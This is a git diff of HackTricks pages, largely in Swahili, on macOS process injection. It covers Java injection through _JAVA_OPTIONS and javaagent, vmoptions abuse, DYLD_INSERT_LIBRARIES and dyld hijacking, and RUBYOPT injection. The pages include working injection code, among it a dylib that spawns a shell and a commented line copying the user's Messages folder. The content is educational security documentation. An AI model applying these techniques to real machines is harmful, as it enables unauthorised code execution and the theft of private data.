@ -91,7 +92,7 @@ SecTaskValidateForRequirement(taskRef, (__bridge CFStringRef)(requirementString)
```
{% endcode %}
Ikiwa msanidi programu hataki kuangalia toleo la mteja, anaweza angalia kuwa mteja hana udhaifu wa kuingiza mchakato angalau:
Ikiwa mendelevu hataki kuangalia toleo la mteja, anaweza kuangalia kwamba mteja si hatarini kwa sindano ya mchakato angalau:
{% code overflow="wrap" %}
```objectivec
@ -110,16 +111,17 @@ return Yes; // Accept connection
```
{% endcode %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

68
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
View file

@ -1,22 +1,23 @@
# Uingizaji wa Programu za Java kwenye macOS
# macOS Java Applications Injection
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Uchunguzi
## Enumeration
Tafuta programu za Java zilizosakinishwa kwenye mfumo wako. Ili kugundua programu za Java katika **Info.plist**, unaweza kutafuta vigezo vya java ambavyo vinajumuisha herufi **`java.`**, hivyo unaweza kutafuta kwa kutumia hilo:
Pata programu za Java zilizowekwa kwenye mfumo wako. Iligundulika kuwa programu za Java katika **Info.plist** zitakuwa na baadhi ya vigezo vya java ambavyo vina nyuzi **`java.`**, hivyo unaweza kutafuta hilo:
```bash
# Search only in /Applications folder
sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
@ -26,13 +27,13 @@ sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
```
## \_JAVA\_OPTIONS
Variable ya mazingira **`_JAVA_OPTIONS`** inaweza kutumika kuwezesha vigezo vya Java visivyo na kikomo katika utekelezaji wa programu iliyoundwa kwa kutumia Java:
Kigezo cha mazingira **`_JAVA_OPTIONS`** kinaweza kutumika kuingiza vigezo vya java vya kiholela katika utekelezaji wa programu iliyotengenezwa kwa java:
```bash
# Write your payload in a script called /tmp/payload.sh
export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
```
Ili kuendesha kama mchakato mpya na sio kama mtoto wa terminal ya sasa, unaweza kutumia:
Ili kuitekeleza kama mchakato mpya na si kama mtoto wa terminal ya sasa unaweza kutumia:
```objectivec
#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
@ -85,7 +86,7 @@ NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary
return 0;
}
```
Hata hivyo, hii itasababisha kosa kwenye programu inayotekelezwa, njia nyingine ya siri zaidi ni kuunda wakala wa Java na kutumia:
Hata hivyo, hiyo itasababisha kosa kwenye programu iliyotekelezwa, njia nyingine ya siri zaidi ni kuunda wakala wa java na kutumia:
```bash
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
@ -95,10 +96,10 @@ export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
```
{% hint style="danger" %}
Kuunda wakala na **toleo tofauti la Java** kutoka kwa programu inaweza kusababisha kushindwa kwa utekelezaji wa wakala na programu
Kuunda wakala kwa **toleo tofauti la Java** kutoka kwa programu kunaweza kusababisha kuanguka kwa utekelezaji wa wakala na programu zote mbili
{% endhint %}
Ambapo wakala anaweza kuwa:
Mahali ambapo wakala anaweza kuwa:
{% code title="Agent.java" %}
```java
@ -119,7 +120,7 @@ err.printStackTrace();
```
{% endcode %}
Ili kutekeleza wakala, endesha:
Ili kukusanya wakala, endesha:
```bash
javac Agent.java # Create Agent.class
jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar
@ -131,7 +132,7 @@ Agent-Class: Agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true
```
Na kisha weka mazingira ya kipekee na endesha programu ya Java kama ifuatavyo:
Na kisha peleka variable ya env na uendeshe programu ya java kama:
```bash
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
@ -140,14 +141,14 @@ export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
```
## Faili la vmoptions
## vmoptions file
Faili hili linasaidia ufafanuzi wa **params za Java** wakati Java inatekelezwa. Unaweza kutumia mbinu zilizotangulia kubadilisha params za java na **kufanya mchakato utekeleze amri za kiholela**.\
Zaidi ya hayo, faili hili pia linaweza **kuhusisha faili zingine** na kwa kutumia `include` directory, hivyo unaweza pia kubadilisha faili iliyohusishwa.
Faili hili linaunga mkono uainishaji wa **Java params** wakati Java inatekelezwa. Unaweza kutumia baadhi ya hila za awali kubadilisha java params na **kufanya mchakato utekeleze amri zisizo za kawaida**.\
Zaidi ya hayo, faili hili linaweza pia **kujumuisha wengine** kwa kutumia saraka ya `include`, hivyo unaweza pia kubadilisha faili iliyojumuishwa.
Zaidi ya hayo, baadhi ya programu za Java zitapakia **zaidi ya faili moja ya `vmoptions`**.
Zaidi ya hayo, baadhi ya programu za Java zitakuwa **zinaweza kupakia zaidi ya faili moja ya `vmoptions`**.
Baadhi ya programu kama Android Studio inaonyesha katika **matokeo yake wapi wanatafuta** faili hizi, kama:
Baadhi ya programu kama Android Studio zinaonyesha katika **matokeo yao wanatazamia** faili hizi, kama:
```bash
/Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions
@ -158,7 +159,7 @@ Baadhi ya programu kama Android Studio inaonyesha katika **matokeo yake wapi wan
2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
```
Ikiwa hawana, unaweza kuchunguza kwa urahisi kwa kutumia:
Ikiwa hawafanyi hivyo, unaweza kuangalia kwa urahisi kwa:
```bash
# Monitor
sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
@ -166,18 +167,19 @@ sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
# Launch the Java app
/Applications/Android\ Studio.app/Contents/MacOS/studio
```
Tazama jinsi ilivyo ya kuvutia kwamba Android Studio katika mfano huu inajaribu kupakia faili **`/Applications/Android Studio.app.vmoptions`**, mahali ambapo mtumiaji yeyote kutoka kwenye kikundi cha **`admin` ana ufikiaji wa kuandika.**
Note how interesting is that Android Studio in this example is trying to load the file **`/Applications/Android Studio.app.vmoptions`**, a place where any user from the **`admin` group has write access.**
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

70
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
View file

@ -1,22 +1,23 @@
# macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES
# macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## DYLD_INSERT_LIBRARIES Mfano wa Msingi
## DYLD\_INSERT\_LIBRARIES Mfano wa msingi
**Mfano wa msingi wa** maktaba ya kuingiza **kutekeleza kifaa cha shell:**
**Maktaba ya kuingiza** ili kutekeleza shell:
```c
// gcc -dynamiclib -o inject.dylib inject.c
@ -34,7 +35,7 @@ execv("/bin/bash", 0);
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
}
```
Binaryi la kushambulia:
Binary ya kushambulia:
```c
// gcc hello.c -o hello
#include <stdio.h>
@ -45,13 +46,13 @@ printf("Hello, World!\n");
return 0;
}
```
Uingizaji:
Uwekaji:
```bash
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
```
## Mfano wa Udukuzi wa Dyld Hijacking
## Mfano wa Dyld Hijacking
Binary iliyolengwa na udhaifu ni `/Applications/VulnDyld.app/Contents/Resources/lib/binary`.
Binary iliyoathirika ni `/Applications/VulnDyld.app/Contents/Resources/lib/binary`.
{% tabs %}
{% tab title="entitlements" %}
@ -91,7 +92,7 @@ compatibility version 1.0.0
{% endtab %}
{% endtabs %}
Kutokana na taarifa tulizopata hapo awali tunajua kwamba **haikagua saini ya maktaba zilizopakiwa** na **inajaribu kupakia maktaba kutoka**:
Kwa taarifa za awali tunajua kwamba **haichunguzi saini ya maktaba zilizopakiwa** na **inajaribu kupakia maktaba kutoka**:
* `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib`
* `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib`
@ -104,7 +105,7 @@ pwd
find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib
```
Kwa hivyo, ni rahisi kuiteka! Unda maktaba ambayo **inatekeleza nambari isiyo ya kawaida na kuuza nje kazi sawa** kama maktaba halali kwa kuiuza nje. Na kumbuka kuichakata na toleo lililotarajiwa:
Hivyo, inawezekana kuiteka! Unda maktaba ambayo **inasimamia baadhi ya msimbo wa kiholela na inatoa kazi sawa** kama maktaba halali kwa kuirejesha. Na kumbuka kuikamilisha na toleo zinazotarajiwa:
{% code title="lib.m" %}
```objectivec
@ -117,7 +118,7 @@ NSLog(@"[+] dylib hijacked in %s", argv[0]);
```
{% endcode %}
Kuikusanya:
Ili kuikamilisha:
{% code overflow="wrap" %}
```bash
@ -126,7 +127,9 @@ gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Found
```
{% endcode %}
Njia ya reexport iliyoundwa kwenye maktaba ni ya kulinganisha na mzigo, tugeuze iwe njia kamili kwa maktaba ya kuuza:
Njia ya reexport iliyoundwa katika maktaba ni ya kuhusiana na loader, hebu tuibadilishe kuwa njia kamili ya maktaba ya kusafirisha:
{% code overflow="wrap" %}
```bash
#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
@ -145,7 +148,7 @@ name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Con
```
{% endcode %}
Hatimaye tu nakili kwenye **eneo lililoporwa**:
Hatimaye nakala tu kwenye **mahali palipoharibiwa**:
{% code overflow="wrap" %}
```bash
@ -153,33 +156,34 @@ cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"
```
{% endcode %}
Na **tekeleza** binary na angalia ikiwa **maktaba imepakia**:
Na **tekeleza** binary na uangalie **maktaba ilipakiwa**:
<pre class="language-context"><code class="lang-context">"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
<strong>2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib imehijacked katika /Applications/VulnDyld.app/Contents/Resources/lib/binary
<strong>2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
</strong>Matumizi: [...]
</code></pre>
{% hint style="info" %}
Maelezo mazuri kuhusu jinsi ya kutumia udhaifu huu kudanganya ruhusa za kamera za telegram zinaweza kupatikana kwenye [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)
Andiko zuri kuhusu jinsi ya kutumia udhaifu huu kuharibu ruhusa za kamera za telegram linaweza kupatikana katika [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)
{% endhint %}
## Kiwango Kubwa
## Kiwango Kikubwa
Ikiwa unapanga kujaribu kuingiza maktaba kwenye binaries ambazo hazikutazamiwa, unaweza kuangalia ujumbe wa matukio ili kujua lini maktaba inapakia ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa `/bin/bash`).
Ikiwa unapanga kujaribu kuingiza maktaba katika binaries zisizotarajiwa unaweza kuangalia ujumbe wa matukio ili kujua wakati maktaba inapopakuliwa ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa `/bin/bash`).
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

46
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
View file

@ -1,24 +1,25 @@
# Uingizaji wa Programu za Ruby kwenye macOS
# macOS Ruby Applications Injection
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## RUBYOPT
Kwa kutumia hii mazingira ya pembejeo, ni **inawezekana kuongeza vigezo vipya** kwa **ruby** wakati wowote inapotekelezwa. Ingawa kigezo **`-e`** hakiwezi kutumika kuainisha nambari ya ruby ya kutekeleza, inawezekana kutumia vigezo **`-I`** na **`-r`** kuongeza saraka mpya kwenye njia ya kupakia maktaba na kisha **kuainisha maktaba ya kupakia**.
Kwa kutumia hii env variable inawezekana **kuongeza params mpya** kwa **ruby** kila wakati inatekelezwa. Ingawa param **`-e`** haiwezi kutumika kubaini ruby code ya kutekeleza, inawezekana kutumia params **`-I`** na **`-r`** kuongeza folda mpya kwenye maktaba za kupakia na kisha **kubaini maktaba ya kupakia**.
Unda maktaba **`inject.rb`** kwenye **`/tmp`**:
Unda maktaba **`inject.rb`** katika **`/tmp`**:
{% code title="inject.rb" %}
```ruby
@ -26,7 +27,7 @@ puts `whoami`
```
{% endcode %}
Tengeneza skripti ya ruby mahali popote kama:
Unda popote script ya ruby kama:
{% code title="hello.rb" %}
```ruby
@ -34,24 +35,25 @@ puts 'Hello, World!'
```
{% endcode %}
Kisha tengeneza skripti ya ruby isiyojulikana na uipakie kwa:
Kisha fanya script ya ruby isiyo na mpangilio iitwe na:
```bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb
```
Ukweli wa kufurahisha, inafanya kazi hata na param **`--disable-rubyopt`**:
Fun fact, inafanya kazi hata na param **`--disable-rubyopt`**:
```bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

152
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md
View file

@ -1,27 +1,33 @@
# macOS xattr-acls extra stuff
# macOS xattr-acls vitu vya ziada
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
